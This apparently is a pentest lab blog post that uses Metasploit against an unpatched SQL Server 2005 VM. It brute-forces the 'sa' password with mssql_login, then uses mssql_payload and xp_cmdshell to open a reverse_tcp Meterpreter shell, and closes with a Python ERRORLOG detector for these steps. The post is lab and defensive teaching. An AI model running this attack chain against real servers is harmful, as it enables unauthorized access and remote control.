Channel: Pax Pentest » Virtual Hacking Lab

Metasploit: Exploiting MS SQL Server: Fast-Track, mssql_ping, mssql_login, mssql_payload, Meterpreter Shell

I’m targeting the MS SQL Server on the Windows portion of my Virtual Hacking Lab, following the instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.

The target system is Windows XP Pro Service Pack 2 (unpatched) with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First step: an Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Service Pack is installed, but of course I know it’s Service Pack 2.

MS SQL listens by default on TCP port 1433 and UDP port 1434, so I also need to confirm UDP port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And the scan confirms this (open|filtered is the most Nmap can report for a UDP port that sends no reply to its probe; mssql_ping below settles the question).

Now to use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Lots of information here. Now to brute-force the MS SQL login with mssql_login:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'

MS SQL password and login successfully guessed.

Now to use mssql_payload, which abuses the xp_cmdshell extended stored procedure to run the payload:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress - 1.47% done (1499/102246 bytes)

[....]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

So I’m inside the target machine with the Meterpreter shell.
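From the blue-team side, the two steps above leave distinctive traces in the SQL Server ERRORLOG: a burst of failed 'sa' logins from one client (mssql_login), a successful login from the same client, and the "Configuration option 'xp_cmdshell' changed from 0 to 1" message written when mssql_payload enables xp_cmdshell. The following detector is an added example, not code from the book, Metasploit or the original post. The log lines it runs over are constructed to mimic the ERRORLOG format; the timestamps, client addresses and spid are assumptions. It also assumes login auditing is set to record successful as well as failed logins, which is what makes the "Login succeeded" line available.

```python
"""Flag a SQL Server login brute force and an xp_cmdshell enable in ERRORLOG text.

Added example (not from the original post). The ERRORLOG sample below is
constructed; addresses, times and spids are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ERRORLOG line: "<timestamp> <source>   <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
FAIL_RE = re.compile(
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
OK_RE = re.compile(
    r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CMDSHELL_RE = re.compile(
    r"Configuration option 'xp_cmdshell' changed from (?P<old>\d+) to (?P<new>\d+)")


def parse_ts(text):
    # %f accepts the two-digit fraction SQL Server writes.
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (kind, where, detail) alerts in log order.

    brute_force            : >= threshold failed logins from one client inside window
    success_after_failures : a successful login from a client already flagged
    xp_cmdshell_enabled    : sp_configure flipped xp_cmdshell from 0 to 1
    """
    alerts = []
    failures = defaultdict(deque)   # client -> timestamps of failures still in window
    flagged = set()                 # clients already reported for brute forcing
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue                # wrapped continuation lines carry no timestamp
        ts, src, msg = parse_ts(m.group("ts")), m.group("src"), m.group("msg")

        fail = FAIL_RE.search(msg)
        if fail:
            client = fail.group("client")
            q = failures[client]
            q.append(ts)
            while q and ts - q[0] > window:     # slide the window forward
                q.popleft()
            if len(q) >= threshold and client not in flagged:
                flagged.add(client)
                alerts.append(("brute_force", client, fail.group("user")))
            continue

        ok = OK_RE.search(msg)
        if ok:
            if ok.group("client") in flagged:   # guess succeeded after the burst
                alerts.append(("success_after_failures", ok.group("client"), ok.group("user")))
            continue

        cfg = CMDSHELL_RE.search(msg)
        if cfg and cfg.group("old") == "0" and cfg.group("new") == "1":
            alerts.append(("xp_cmdshell_enabled", src, ts.isoformat()))
    return alerts


# Constructed ERRORLOG excerpt: six bad 'sa' guesses from one client, one
# unrelated typo from another, the successful guess, then xp_cmdshell turned on.
FAIL_MSG = ("Login failed for user 'sa'. Reason: Password did not match that for "
            "the login provided. [CLIENT: 192.168.1.70]")
SAMPLE_ERRORLOG = "\n".join(
    ["2013-06-13 10:38:0%d.1%d Logon       Error: 18456, Severity: 14, State: 8.\n"
     "2013-06-13 10:38:0%d.1%d Logon       %s" % (i, i, i, i, FAIL_MSG) for i in range(6)]
    + ["2013-06-13 10:38:06.00 Logon       Login failed for user 'webapp'. Reason: Password "
       "did not match that for the login provided. [CLIENT: 192.168.1.50]",
       "2013-06-13 10:38:07.02 Logon       Login succeeded for user 'sa'. Connection made "
       "using SQL Server authentication. [CLIENT: 192.168.1.70]",
       "2013-06-13 10:38:09.40 spid51      Configuration option 'show advanced options' "
       "changed from 0 to 1. Run the RECONFIGURE statement to install.",
       "2013-06-13 10:38:09.41 spid51      Configuration option 'xp_cmdshell' changed "
       "from 0 to 1. Run the RECONFIGURE statement to install."]) + "\n"

if __name__ == "__main__":
    for alert in analyze(SAMPLE_ERRORLOG):
        print(alert)
```

The threshold and window are the knobs to tune against a real instance's baseline of mistyped passwords; the single 'webapp' failure from 192.168.1.50 is there to show a lone typo does not fire. The xp_cmdshell message is written whenever sp_configure changes the option, so it fires on a legitimate administrator as well, which is exactly why it is worth alerting on.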

In my next post I will explore what to do next with Meterpreter.
